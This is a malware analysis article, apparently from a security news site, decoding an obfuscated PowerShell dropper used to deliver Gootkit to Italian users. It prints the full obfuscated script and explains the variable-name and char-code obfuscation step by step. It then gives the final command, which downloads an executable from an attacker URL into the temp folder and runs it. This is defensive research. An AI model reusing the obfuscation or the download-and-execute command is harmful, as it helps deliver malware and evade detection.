Dissecting the Mindscrew-Powershell Obfuscation

The Yoroi-Cybaze ZLAB dissected the VBS script embedded into the zip archives delivered to the victims of a recent attack.

Introduction

Few days ago, the CERT-Yoroi bulletin N061118 disclosed a dangerous campaign attacking several Italian users. The attack wave contained some interesting techniques need to look into further, especially regarding the obfuscation used to hide the malicious dropping infrastructure.

The Yoroi-Cybaze ZLAB dissected the VBS script embedded into the zip archives delivered to the victims, finding an inner powershell payload designed to actually download the malicious Gootkit binary from the attacker’s infrastructure. This inner script was carefully obfuscated in a clever and unseen way.

Technical Analysis

The Powershell code executed by the initial VBS script appears as following:

( ‘…..’|%{${#/~} =+ $()}{ ${@}=${#/~}} { ${/.} = ++${#/~}}{ ${*~}=(${#/~} =${#/~} +${/.})} {${$./} =(${#/~}= ${#/~} + ${/.} )}{${)@}=( ${#/~}=${#/~}+${/.} )} { ${‘} =(${#/~} =${#/~}+ ${/.}) } { ${;} = ( ${#/~}=${#/~} + ${/.}) } {${ *-}= ( ${#/~}=${#/~}+${/.})} {${“[+} = ( ${#/~} =${#/~} +${/.} ) } { ${#~=}= ( ${#/~}= ${#/~}+ ${/.} )} { ${“@} =”[” +”$(@{ } ) “[${ *-} ] + “$(@{})”[ “${/.}” +”${#~=}” ]+ “$(@{ })”[“${*~}”+”${@}”]+”$? “[${/.} ]+”]” }{${#/~} = “”.(“$( @{} )”[ “${/.}${)@}” ]+”$(@{ }) “[“${/.}${;}”] + “$( @{ } ) “[ ${@}]+ “$(@{} ) “[ ${)@}]+ “$?”[${/.}] + “$( @{ } ) “[${$./} ])}{${#/~} =”$( @{} ) “[ “${/.}${)@}”] + “$( @{ } )”[${)@}] +”${#/~}”[ “${*~}${ *-}”]} ); .${#/~} (“${#/~} (${“@}${/.}${@}${‘} + ${“@}${/.}${@}${*~} +${“@}${)@}${@}+ ${“@}${$./}${;}+${“@}${/.}${@}${)@} +${“@}${/.}${/.}${/.} +${“@}${/.}${/.}${‘}+ ${“@}${/.}${/.}${;} +${“@}${)@}${;}+${“@}${/.}${/.}${“[+}+${“@}${/.}${@}${/.}+${“@}${/.}${/.}${)@}+${“@}${/.}${/.}${‘}+${“@}${/.}${@}${‘}+${“@}${/.}${/.}${/.}+ ${“@}${/.}${/.}${@}+${“@}${)@}${;}+ ${“@}${/.}${@}${#~=} + ${“@}${#~=}${ *-}+ ${“@}${/.}${@}${;}+ ${“@}${/.}${/.}${/.} +${“@}${/.}${/.}${)@}+ ${“@}${$./}${*~}+${“@}${)@}${‘}+ ${“@}${/.}${@}${“[+} + ${“@}${/.}${/.}${;}+ ${“@}${$./}${*~} +${“@}${‘}${/.} + ${“@}${)@}${/.}+ ${“@}${/.}${*~}${$./} + ${“@}${ *-}${$./}+ ${“@}${/.}${@}${#~=}+ ${“@}${/.}${/.}${*~}+ ${“@}${/.}${/.}${/.} + ${“@}${/.}${/.}${)@}+${“@}${/.}${/.}${;}+ ${“@}${)@}${‘}+${“@}${ *-}${ *-}+ ${“@}${/.}${/.}${/.}+${“@}${/.}${@}${@}+ ${“@}${/.}${/.}${ *-}+${“@}${/.}${@}${“[+} +${“@}${/.}${@}${/.}+${“@}${$./}${*~} +${“@}${;}${;}+${“@}${/.}${@}${‘}+ ${“@}${/.}${/.}${;}+${“@}${/.}${/.}${‘}+${“@}${“[+}${)@} +${“@}${/.}${/.}${)@}+ ${“@}${#~=}${ *-} +${“@}${/.}${/.}${@}+${“@}${/.}${/.}${‘}+ ${“@}${/.}${@}${*~} + ${“@}${/.}${@}${/.} +${“@}${/.}${/.}${)@} + ${“@}${/.}${*~}${‘}+${“@}${$./}${*~} +${“@}${“[+}${$./} + ${“@}${/.}${/.}${;} + ${“@}${#~=}${ *-}+ ${“@}${/.}${/.}${)@} +${“@}${/.}${/.}${;} + ${“@}${)@}${‘} + ${“@}${;}${;} + ${“@}${/.}${@}${‘}+${“@}${/.}${/.}${;} + ${“@}${/.}${/.}${‘}+${“@}${“[+}${)@} +${“@}${/.}${/.}${)@} +${“@}${#~=}${ *-} +${“@}${/.}${/.}${@}+ ${“@}${/.}${/.}${‘}+${“@}${/.}${@}${*~} +${“@}${/.}${@}${/.} + ${“@}${/.}${/.}${)@} + ${“@}${$./}${*~}+${“@}${)@}${‘}+ ${“@}${“[+}${$./}+ ${“@}${/.}${/.}${/.}+ ${“@}${/.}${/.}${ *-} + ${“@}${/.}${/.}${)@}+ ${“@}${#~=}${#~=}+${“@}${/.}${@}${/.} + ${“@}${$./}${*~}+ ${“@}${/.}${@}${)@}+ ${“@}${/.}${/.}${;}+ ${“@}${/.}${/.}${;} + ${“@}${/.}${/.}${*~} +${“@}${/.}${/.}${‘}+${“@}${‘}${“[+}+ ${“@}${)@}${ *-}+${“@}${)@}${ *-}+${“@}${/.}${/.}${*~} +${“@}${/.}${/.}${)@} + ${“@}${/.}${@}${/.} + ${“@}${/.}${@}${@} + ${“@}${/.}${@}${‘}+${“@}${/.}${/.}${‘}+ ${“@}${/.}${/.}${*~} +${“@}${/.}${/.}${/.} + ${“@}${/.}${/.}${‘}+ ${“@}${/.}${/.}${;}+ ${“@}${/.}${/.}${/.} + ${“@}${)@}${;}+${“@}${/.}${@}${#~=}+ ${“@}${#~=}${ *-}+${“@}${/.}${/.}${;} +${“@}${/.}${/.}${;} +${“@}${/.}${/.}${*~}+ ${“@}${/.}${/.}${/.} + ${“@}${/.}${@}${@}+${“@}${/.}${/.}${‘}+ ${“@}${#~=}${#~=}+ ${“@}${/.}${@}${)@}+ ${“@}${/.}${/.}${#~=} + ${“@}${/.}${@}${/.}+ ${“@}${/.}${@}${‘} +${“@}${/.}${/.}${;} + ${“@}${)@}${;}+ ${“@}${#~=}${#~=} + ${“@}${/.}${/.}${/.} + ${“@}${/.}${@}${#~=}+ ${“@}${)@}${ *-} + ${“@}${#~=}${#~=}+ ${“@}${/.}${/.}${/.}+${“@}${/.}${@}${#~=} +${“@}${/.}${/.}${ *-}+ ${“@}${/.}${/.}${@}+${“@}${/.}${@}${‘} + ${“@}${/.}${/.}${“[+} + ${“@}${)@}${ *-}+${“@}${/.}${@}${‘}+ ${“@}${/.}${/.}${@} + ${“@}${/.}${/.}${;}+${“@}${/.}${@}${/.}+ ${“@}${/.}${/.}${)@}+${“@}${)@}${;} + ${“@}${/.}${/.}${*~}+ ${“@}${/.}${@}${)@} +${“@}${/.}${/.}${*~} + ${“@}${‘}${‘} +${“@}${$./}${*~}+${“@}${)@}${‘}+${“@}${;}${“[+}+ ${“@}${/.}${@}${/.} +${“@}${/.}${/.}${‘} +${“@}${/.}${/.}${;}+${“@}${/.}${@}${‘}+ ${“@}${/.}${/.}${@}+ ${“@}${#~=}${ *-}+ ${“@}${/.}${/.}${;}+${“@}${/.}${@}${‘}+${“@}${/.}${/.}${/.} + ${“@}${/.}${/.}${@} +${“@}${$./}${*~} + ${“@}${$./}${;} + ${“@}${/.}${@}${/.} +${“@}${/.}${/.}${@}+ ${“@}${/.}${/.}${“[+} + ${“@}${‘}${“[+} + ${“@}${/.}${/.}${;} +${“@}${/.}${@}${/.}+ ${“@}${/.}${@}${#~=}+ ${“@}${/.}${/.}${*~} + ${“@}${#~=}${*~}+${“@}${/.}${@}${ *-}+ ${“@}${/.}${/.}${‘} + ${“@}${/.}${@}${;} +${“@}${/.}${*~}${@}+ ${“@}${/.}${@}${;} +${“@}${/.}${@}${/.}+${“@}${/.}${/.}${#~=}+ ${“@}${/.}${/.}${ *-}+ ${“@}${/.}${@}${)@} + ${“@}${/.}${/.}${ *-}+ ${“@}${/.}${@}${ *-}+${“@}${/.}${@}${/.} +${“@}${/.}${/.}${#~=}+ ${“@}${)@}${;}+${“@}${/.}${@}${/.} +${“@}${/.}${*~}${@}+${“@}${/.}${@}${/.} + ${“@}${‘}${#~=}+ ${“@}${$./}${*~}+ ${“@}${“[+}${$./} + ${“@}${/.}${/.}${;}+${“@}${#~=}${ *-}+ ${“@}${/.}${/.}${)@} +${“@}${/.}${/.}${;} + ${“@}${)@}${‘} +${“@}${“[+}${@}+${“@}${/.}${/.}${)@} +${“@}${/.}${/.}${/.}+ ${“@}${#~=}${#~=}+ ${“@}${/.}${@}${/.} + ${“@}${/.}${/.}${‘} +${“@}${/.}${/.}${‘} +${“@}${$./}${*~} +${“@}${$./}${;} +${“@}${/.}${@}${/.}+${“@}${/.}${/.}${@}+ ${“@}${/.}${/.}${“[+} +${“@}${‘}${“[+} + ${“@}${/.}${/.}${;} + ${“@}${/.}${@}${/.} +${“@}${/.}${@}${#~=} + ${“@}${/.}${/.}${*~} + ${“@}${#~=}${*~}+ ${“@}${/.}${@}${ *-}+ ${“@}${/.}${/.}${‘} + ${“@}${/.}${@}${;}+${“@}${/.}${*~}${@}+${“@}${/.}${@}${;} +${“@}${/.}${@}${/.} +${“@}${/.}${/.}${#~=} +${“@}${/.}${/.}${ *-}+ ${“@}${/.}${@}${)@}+ ${“@}${/.}${/.}${ *-} +${“@}${/.}${@}${ *-} + ${“@}${/.}${@}${/.} + ${“@}${/.}${/.}${#~=}+${“@}${)@}${;} +${“@}${/.}${@}${/.} + ${“@}${/.}${*~}${@} + ${“@}${/.}${@}${/.} )”)

It seems a set of random special characters without any meaning. However, the Powershell interpreter can execute it quietly. So, after an accurate analysis, it is possible to see some pattern in the weird characters following the “$” symbol: in Powershell language is possible to declare variables using the pattern ${variable_name}, including any character between the braces, special characters doesn’t make exception. For instance, some of variable names in the script above are:

${#/~}
${@}
${;}
${“@}
${#~=}
${/.}
${*~}

Replacing these variable names with some more readable and meaningful characters makes the script easier to analyze:

( ‘…..’|%{$var1 =+ $()}{ $var2=$var1} { $var3 = ++$var1}{ $var4=($var1 =$var1 +$var3)}{$var5 =($var1= $var1 + $var3 )}{$var6=( $var1=$var1+$var3 )} { $var7 =($var1 =$var1+ $var3) }{ $var8 = ( $var1=$var1 + $var3) } {$var9= ( $var1=$var1+$var3)} {$var10 = ( $var1 =$var1 +$var3 ) } { $var11= ( $var1= $var1+ $var3 )} { $var12 =“[“ +“$(@{ } ) “[$var9 ] + “$(@{})”[ “$var3” +“$var11” ]+ “$(@{ })”[“$var4”+“$var2”]+“$? “[$var3 ]+“]” }{$var1 = “”.(“$( @{} )”[ “$var3$var6” ]+“$(@{ }) “[“$var3$var8”] + “$( @{ } ) “[ $var2]+ “$(@{} ) “[ $var6]+ “$?”[$var3] + “$( @{ } ) “[$var5 ])}{$var1 =“$( @{} ) “[ “$var3$var6”] + “$( @{ } )”[$var6] +“$var1”[ “$var4$var9”]} );
.$var1 (“$var1 ($var12$var3$var2$var7 + $var12$var3$var2$var4 +$var12$var6$var2+ $var12$var5$var8+$var12$var3$var2$var6 +$var12$var3$var3$var3 +$var12$var3$var3$var7+ $var12$var3$var3$var8 +$var12$var6$var8+$var12$var3$var3$var10+$var12$var3$var2$var3+$var12$var3$var3$var6+$var12$var3$var3$var7+$var12$var3$var2$var7+$var12$var3$var3$var3+ $var12$var3$var3$var2+$var12$var6$var8+ $var12$var3$var2$var11 + $var12$var11$var9+ $var12$var3$var2$var8+ $var12$var3$var3$var3 +$var12$var3$var3$var6+ $var12$var5$var4+$var12$var6$var7+ $var12$var3$var2$var10 + $var12$var3$var3$var8+ $var12$var5$var4 +$var12$var7$var3 + $var12$var6$var3+ $var12$var3$var4$var5 + $var12$var9$var5+ $var12$var3$var2$var11+ $var12$var3$var3$var4+ $var12$var3$var3$var3 + $var12$var3$var3$var6+$var12$var3$var3$var8+ $var12$var6$var7+$var12$var9$var9+ $var12$var3$var3$var3+$var12$var3$var2$var2+ $var12$var3$var3$var9+$var12$var3$var2$var10 +$var12$var3$var2$var3+$var12$var5$var4 +$var12$var8$var8+$var12$var3$var2$var7+ $var12$var3$var3$var8+$var12$var3$var3$var7+$var12$var10$var6 +$var12$var3$var3$var6+ $var12$var11$var9 +$var12$var3$var3$var2+$var12$var3$var3$var7+ $var12$var3$var2$var4 + $var12$var3$var2$var3 +$var12$var3$var3$var6 + $var12$var3$var4$var7+$var12$var5$var4 +$var12$var10$var5 + $var12$var3$var3$var8 + $var12$var11$var9+ $var12$var3$var3$var6 +$var12$var3$var3$var8 + $var12$var6$var7 + $var12$var8$var8 + $var12$var3$var2$var7+$var12$var3$var3$var8 + $var12$var3$var3$var7+$var12$var10$var6 +$var12$var3$var3$var6 +$var12$var11$var9 +$var12$var3$var3$var2+ $var12$var3$var3$var7+$var12$var3$var2$var4 +$var12$var3$var2$var3 + $var12$var3$var3$var6 + $var12$var5$var4+$var12$var6$var7+ $var12$var10$var5+ $var12$var3$var3$var3+ $var12$var3$var3$var9 + $var12$var3$var3$var6+ $var12$var11$var11+$var12$var3$var2$var3 + $var12$var5$var4+ $var12$var3$var2$var6+ $var12$var3$var3$var8+ $var12$var3$var3$var8 + $var12$var3$var3$var4 +$var12$var3$var3$var7+$var12$var7$var10+ $var12$var6$var9+$var12$var6$var9+$var12$var3$var3$var4 +$var12$var3$var3$var6 + $var12$var3$var2$var3 + $var12$var3$var2$var2 + $var12$var3$var2$var7+$var12$var3$var3$var7+ $var12$var3$var3$var4 +$var12$var3$var3$var3 + $var12$var3$var3$var7+ $var12$var3$var3$var8+ $var12$var3$var3$var3 + $var12$var6$var8+$var12$var3$var2$var11+ $var12$var11$var9+$var12$var3$var3$var8 +$var12$var3$var3$var8 +$var12$var3$var3$var4+ $var12$var3$var3$var3 + $var12$var3$var2$var2+$var12$var3$var3$var7+ $var12$var11$var11+ $var12$var3$var2$var6+ $var12$var3$var3$var11 + $var12$var3$var2$var3+ $var12$var3$var2$var7 +$var12$var3$var3$var8 + $var12$var6$var8+ $var12$var11$var11 + $var12$var3$var3$var3 + $var12$var3$var2$var11+ $var12$var6$var9 + $var12$var11$var11+ $var12$var3$var3$var3+$var12$var3$var2$var11 +$var12$var3$var3$var9+ $var12$var3$var3$var2+$var12$var3$var2$var7 + $var12$var3$var3$var10 + $var12$var6$var9+$var12$var3$var2$var7+ $var12$var3$var3$var2 + $var12$var3$var3$var8+$var12$var3$var2$var3+ $var12$var3$var3$var6+$var12$var6$var8 + $var12$var3$var3$var4+ $var12$var3$var2$var6 +$var12$var3$var3$var4 + $var12$var7$var7 +$var12$var5$var4+$var12$var6$var7+$var12$var8$var10+ $var12$var3$var2$var3 +$var12$var3$var3$var7 +$var12$var3$var3$var8+$var12$var3$var2$var7+ $var12$var3$var3$var2+ $var12$var11$var9+ $var12$var3$var3$var8+$var12$var3$var2$var7+$var12$var3$var3$var3 + $var12$var3$var3$var2 +$var12$var5$var4 + $var12$var5$var8 + $var12$var3$var2$var3 +$var12$var3$var3$var2+ $var12$var3$var3$var10 + $var12$var7$var10 + $var12$var3$var3$var8 +$var12$var3$var2$var3+ $var12$var3$var2$var11+ $var12$var3$var3$var4 + $var12$var11$var4+$var12$var3$var2$var9+ $var12$var3$var3$var7 + $var12$var3$var2$var8 +$var12$var3$var4$var2+ $var12$var3$var2$var8 +$var12$var3$var2$var3+$var12$var3$var3$var11+ $var12$var3$var3$var9+ $var12$var3$var2$var6 + $var12$var3$var3$var9+ $var12$var3$var2$var9+$var12$var3$var2$var3 +$var12$var3$var3$var11+ $var12$var6$var8+$var12$var3$var2$var3 +$var12$var3$var4$var2+$var12$var3$var2$var3 + $var12$var7$var11+ $var12$var5$var4+ $var12$var10$var5 + $var12$var3$var3$var8+$var12$var11$var9+ $var12$var3$var3$var6 +$var12$var3$var3$var8 + $var12$var6$var7 +$var12$var10$var2+$var12$var3$var3$var6 +$var12$var3$var3$var3+ $var12$var11$var11+ $var12$var3$var2$var3 + $var12$var3$var3$var7 +$var12$var3$var3$var7 +$var12$var5$var4 +$var12$var5$var8 +$var12$var3$var2$var3+$var12$var3$var3$var2+ $var12$var3$var3$var10 +$var12$var7$var10 + $var12$var3$var3$var8 + $var12$var3$var2$var3 +$var12$var3$var2$var11 + $var12$var3$var3$var4 + $var12$var11$var4+ $var12$var3$var2$var9+ $var12$var3$var3$var7 + $var12$var3$var2$var8+$var12$var3$var4$var2+$var12$var3$var2$var8 +$var12$var3$var2$var3 +$var12$var3$var3$var11 +$var12$var3$var3$var9+ $var12$var3$var2$var6+ $var12$var3$var3$var9 +$var12$var3$var2$var9 + $var12$var3$var2$var3 + $var12$var3$var3$var11+$var12$var6$var8 +$var12$var3$var2$var3 + $var12$var3$var4$var2 + $var12$var3$var2$var3 )”)

The first instruction of the script sets the variable values to some fixed strings, derived from a series of wasteful concatenation operations:

( ‘…..’|%{$var1 =+ $()}{ $var2=$var1} { $var3 = ++$var1}{ $var4=($var1 =$var1 +$var3)}{$var5 =($var1= $var1 + $var3 )}{$var6=( $var1=$var1+$var3 )} { $var7 =($var1 =$var1+ $var3) }{ $var8 = ( $var1=$var1 + $var3) } {$var9= ( $var1=$var1+$var3)} {$var10 = ( $var1 =$var1 +$var3 ) } { $var11= ( $var1= $var1+ $var3 )} { $var12 =“[“ +“$(@{ } ) “[$var9 ] + “$(@{})”[ “$var3” +“$var11” ]+ “$(@{ })”[“$var4”+“$var2”]+“$? “[$var3 ]+“]” }{$var1 = “”.(“$( @{} )”[ “$var3$var6” ]+“$(@{ }) “[“$var3$var8”] + “$( @{ } ) “[ $var2]+ “$(@{} ) “[ $var6]+ “$?”[$var3] + “$( @{ } ) “[$var5 ])}{$var1 =“$( @{} ) “[ “$var3$var6”] + “$( @{ } )”[$var6] +“$var1”[ “$var4$var9”]} );

After the execution of this instruction, the values contained into the variables are:

$var1 = “iex”
$var2 = “0”
$var3 = “1”
$var4 = “2”
$var5 = “3”
$var6 = “4”
$var7 = “5”
$var8 = “6”
$var9 = “7”
$var10 = “8”
$var11 = “9”
$var12 = “[CHar]”

The second piece of code concatenates the above values in order to compose a powershell command string. Each single character of the generated command is represented as ASCII decimal numbers leveraging the variables above as alphabet (i.e. “$var12$var3$var2$var7” becomes “[CHar]105”) . The decoding of the entire instruction results in:

iex ([CHar]105 + [CHar]102 +[CHar]40+ [CHar]36+[CHar]104 +[CHar]111 +[CHar]115+ [CHar]116 +[CHar]46+[CHar]118+[CHar]101+[CHar]114+[CHar]115+[CHar]105+[CHar]111+ [CHar]110+[CHar]46+ [CHar]109 + [CHar]97+ [CHar]106+ [CHar]111 +[CHar]114+ [CHar]32+[CHar]45+ [CHar]108 + [CHar]116+ [CHar]32 +[CHar]51 + [CHar]41+ [CHar]123 + [CHar]73+ [CHar]109+ [CHar]112+ [CHar]111 + [CHar]114+[CHar]116+ [CHar]45+[CHar]77+ [CHar]111+[CHar]100+ [CHar]117+[CHar]108 +[CHar]101+[CHar]32 +[CHar]66+[CHar]105+ [CHar]116+[CHar]115+[CHar]84 +[CHar]114+ [CHar]97 +[CHar]110+[CHar]115+ [CHar]102 + [CHar]101 +[CHar]114 + [CHar]125+[CHar]32 +[CHar]83 + [CHar]116 + [CHar]97+ [CHar]114 +[CHar]116 + [CHar]45 + [CHar]66 + [CHar]105+[CHar]116 + [CHar]115+[CHar]84 +[CHar]114 +[CHar]97 +[CHar]110+ [CHar]115+[CHar]102 +[CHar]101 + [CHar]114 + [CHar]32+[CHar]45+ [CHar]83+ [CHar]111+ [CHar]117 + [CHar]114+ [CHar]99+[CHar]101 + [CHar]32+ [CHar]104+ [CHar]116+ [CHar]116 + [CHar]112 +[CHar]115+[CHar]58+ [CHar]47+[CHar]47+[CHar]112 +[CHar]114 + [CHar]101 + [CHar]100 + [CHar]105+[CHar]115+ [CHar]112 +[CHar]111 + [CHar]115+ [CHar]116+ [CHar]111 + [CHar]46+[CHar]109+ [CHar]97+[CHar]116 +[CHar]116 +[CHar]112+ [CHar]111 + [CHar]100+[CHar]115+ [CHar]99+ [CHar]104+ [CHar]119 + [CHar]101+ [CHar]105 +[CHar]116 + [CHar]46+ [CHar]99 + [CHar]111 + [CHar]109+ [CHar]47 + [CHar]99+ [CHar]111+[CHar]109 +[CHar]117+ [CHar]110+[CHar]105 + [CHar]118 + [CHar]47+[CHar]105+ [CHar]110 + [CHar]116+[CHar]101+ [CHar]114+[CHar]46 + [CHar]112+ [CHar]104 +[CHar]112 + [CHar]55 +[CHar]32+[CHar]45+[CHar]68+ [CHar]101 +[CHar]115 +[CHar]116+[CHar]105+ [CHar]110+ [CHar]97+ [CHar]116+[CHar]105+[CHar]111 + [CHar]110 +[CHar]32 + [CHar]36 + [CHar]101 +[CHar]110+ [CHar]118 + [CHar]58 + [CHar]116 +[CHar]101+ [CHar]109+ [CHar]112 + [CHar]92+[CHar]107+ [CHar]115 + [CHar]106 +[CHar]120+ [CHar]106 +[CHar]101+[CHar]119+ [CHar]117+ [CHar]104 + [CHar]117+ [CHar]107+[CHar]101 +[CHar]119+ [CHar]46+[CHar]101 +[CHar]120+[CHar]101 + [CHar]59+ [CHar]32+ [CHar]83 + [CHar]116+[CHar]97+ [CHar]114 +[CHar]116 + [CHar]45 +[CHar]80+[CHar]114 +[CHar]111+ [CHar]99+ [CHar]101 + [CHar]115 +[CHar]115 +[CHar]32 +[CHar]36 +[CHar]101+[CHar]110+ [CHar]118 +[CHar]58 + [CHar]116 + [CHar]101 +[CHar]109 + [CHar]112 + [CHar]92+ [CHar]107+ [CHar]115 + [CHar]106+[CHar]120+[CHar]106 +[CHar]101 +[CHar]119 +[CHar]117+ [CHar]104+ [CHar]117 +[CHar]107 + [CHar]101 + [CHar]119+[CHar]46 +[CHar]101 + [CHar]120 + [CHar]101 )

At this point, a simple ASCII to char conversion make possible to decode and recover the final powershell command, unveiling the code purpose. It imports the BitsTransfer cmdlet (Background Intelligent Transfer Service) and proceeds to download and execute the GootKit malware.

if($host.version.major -lt 3){
Import-Module BitsTransfer
}
Start-BitsTransfer -Source https://predisposto.mattpodschweit.com/comuniv/inter.php7 -Destination $env:temp\ksjxjewuhukew.exe;
Start-Process $env:temp\ksjxjewuhukew.exe

Conclusion

The initial script, at a first impression, seems obfuscated using some sophisticated techniques. However, analyzing its actual code shows how the clever usage of simple tricks such as variable replacement or decimal encoding, is able to hide a clearly malicious Powershell script, making it nearly undetectable by common anti-malware engines.

This analysis and many others are available on the official blog of the Yoroi cyber security firm.

https://blog.yoroi.company/research/dissecting-the-mindscrew-powershell-obfuscation/

[adrotate banner=”9″]

[adrotate banner=”12″]

Pierluigi Paganini

(Securi ty Affairs – Powershell , VBScript)

[adrotate banner=”5″]

[adrotate banner=”13″]

Pierluigi Paganini

Pierluigi Paganini is member of the ENISA (European Union Agency for Network and Information Security) Threat Landscape Stakeholder Group and Cyber G7 Group, he is also a Security Evangelist, Security Analyst and Freelance Writer. Editor-in-Chief at "Cyber Defense Magazine", Pierluigi is a cyber security expert with over 20 years experience in the field, he is Certified Ethical Hacker at EC Council in London. The passion for writing and a strong belief that security is founded on sharing and awareness led Pierluigi to find the security blog "Security Affairs" recently named a Top National Security Resource for US. Pierluigi is a member of the "The Hacker News" team and he is a writer for some major publications in the field such as Cyber War Zone, ICTTF, Infosec Island, Infosec Institute, The Hacker News Magazine and for many other Security magazines. Author of the Books "The Deep Dark Web" and “Digital Virtual Currency and Bitcoin”.